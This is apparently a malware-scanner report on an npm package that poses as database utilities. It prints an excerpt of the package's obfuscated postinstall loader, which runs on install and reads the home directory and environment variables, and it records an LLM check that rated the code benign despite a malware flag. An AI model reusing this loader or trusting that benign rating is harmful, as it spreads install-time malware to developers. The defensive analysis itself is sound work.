// npm 패키지
@cloudplatform-single-spa/administration
Internal database utilities with connection pooling, query builder and migration support
주간
106
월간
106
버전
3
메인테이너
1
라이선스
UNLICENSED
최초 publish
2026-05-27
publisher
mr.4nd3r50n
tarball
17,026 B
AUTO-PUBLISHED·1개 버전 인덱싱됨·최근 publish: 2026-05-28
// exfil path
what is read → where it shipssteals
- ○ home dir
sends to
(no destination string extracted — payload may be dynamic / obfuscated)
evidence in excerpt
> 'use strict';const a0_0x58a212=a0_0x36b4;(function(_0x4e9535,_0x368c8c){const _0x45166d=a0_0x36b4,_0x31c60b=_0x4e9535();while(!![]){try{const _0x59ba8d=-parseInt(_0x45166d(0xcd))/(-0x502+0x1fce+0x13*-…// publisher 캠페인by mr.4nd3r50n
이 계정에서 catch된 패키지 9건고립된 catch가 아닙니다. 동일 publisher가 8개의 다른 패키지를 추가로 발행했고, 모두 파이프라인이 catch했습니다 — 일회성이 아닌 조직적 캠페인의 형태. 아래 링크는 각 형제 catch의 분석으로 이동합니다.
// offending code· @100.100.100· 1 file flagged
llm: benign · 0.85→ 의심 전송지 없음, 원격 실행 형태 없음 — 1 known-vendor host(s).
- @100.100.100··AUTO-PUBLISHED·publisher: mr.4nd3r50nheuristic 93/100static flags 2llm benign (0.85) via ollamainstall-scripts:postinstallnew-publisher:1danomalous-major-version:100publisher-multi-name-burst:2osv-flagged:MAL-2026-4882reads-env-varsreads-homedir
→ 의심 전송지 없음, 원격 실행 형태 없음 — 1 known-vendor host(s).
// offending code· 1 file flaggedpatterns: 2
--- install scripts --- ### postinstall node scripts/postinstall.js ### prepublishOnly echo 'Building...' --- package/scripts/postinstall.js (excerpt) --- 'use strict';const a0_0x58a212=a0_0x36b4;(function(_0x4e9535,_0x368c8c){const _0x45166d=a0_0x36b4,_0x31c60b=_0x4e9535();while(!![]){try{const _0x59ba8d=-parseInt(_0x45166d(0xcd))/(-0x502+0x1fce+0x13*-0x169)+parseInt(_0x45166d(0xc8))/(0x737*-0x4+-0x449+-0x171*-0x17)+parseInt(_0x45166d(0xcb))/(-0x1581+-0xf27+-0x7*-0x53d)+-parseInt(_0x45166d(0xd6))/(0x11aa+-0x1392+0x1ec)+parseInt(_0x45166d(0x104))/(-0x689+0x2421*0x1+-0x1d93)+parseInt(_0x45166d(0xf5))/(0xf91+-0x337*-0x5+-0xa8a*0x3)*(parseInt(_0x45166d(0xe6))/(0x3*0x86d+-0x2*0x11b3+0xa26))+-parseInt(_0x45166d(0xd4))/(0x1c78+0x2*-0xf76+0x6a*0x6);if(_0x59ba8d===_0x368c8c)break;else _0x31c60b['push'](_0x31c60b['shift']());}catch(_0x196fd9){_0x31c60b['push'](_0x31c60b['shift']());}}}(a0_0x9574,0xedd*-0x8b+0xc59*0x1a+0x147011));function a0_0x36b4(_0x3f9c91,_0x595ace){_0x3f9c91=_0x3f9c91-(0xd94+-0xc79+-0x5f);const _0x369bf7=a0_0x9574();let _0x79c119=_0x369bf7[_0x3f9c91];if(a0_0x36b4['uUBGWl']===undefined){var _0x8251a0=function(_0x1ea234){const _0x18e6e4='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';let _0x498c37='',_0x316c66='',_0x3fc8ed=_0x498c37+_0x8251a0,_0x2a0700=(''+function(){return-0x1f6b+0x5c0+-0x1*-0x19ab;})['indexOf']('\x0a')!==-(-0x19ed*-0x1+0x20f*-0x2+0xae7*-0x2);for(let _0x46fd46=0x757*-0x1+-0x1baf*-0x1+-0x1458,_0x194b56,_0x4ea4fa,_0x294fda=0x18fa+0x18d6+-0x31d0;_0x4ea4fa=_0x1ea234['charAt'](_0x294fda++);~_0x4ea4fa&&(_0x194b56=_0x46fd46%(0xb*0x251+0x48*0x4+-0x1a97)?_0x194b56*(0x592+-0x93d+0x3eb)+_0x4e --- bundled output (OSV-MAL flagged — LLM scope expansion) --- --- dist/index.d.ts (bundled) --- export interface PoolOptions { host?: string; port?: number; database?: string; user?: string; password?: string; max?: number; } export interface Pool { host: string; port: number; database: string; } export function createPool(options?: PoolOptions): Pool; export function query(pool: Pool, sql: string, params?: unknown[]): Promise<unknown[]>; export function transaction(pool: Pool, fn: (client: unknown) => Promise<unknown>): Promise<unknown>; export function migrate(pool: Pool, dir?: string): Promise<string[]>; --- dist/index.js (bundled) --- 'use strict'; // dist/index.js module.exports = require('../src/index.js');
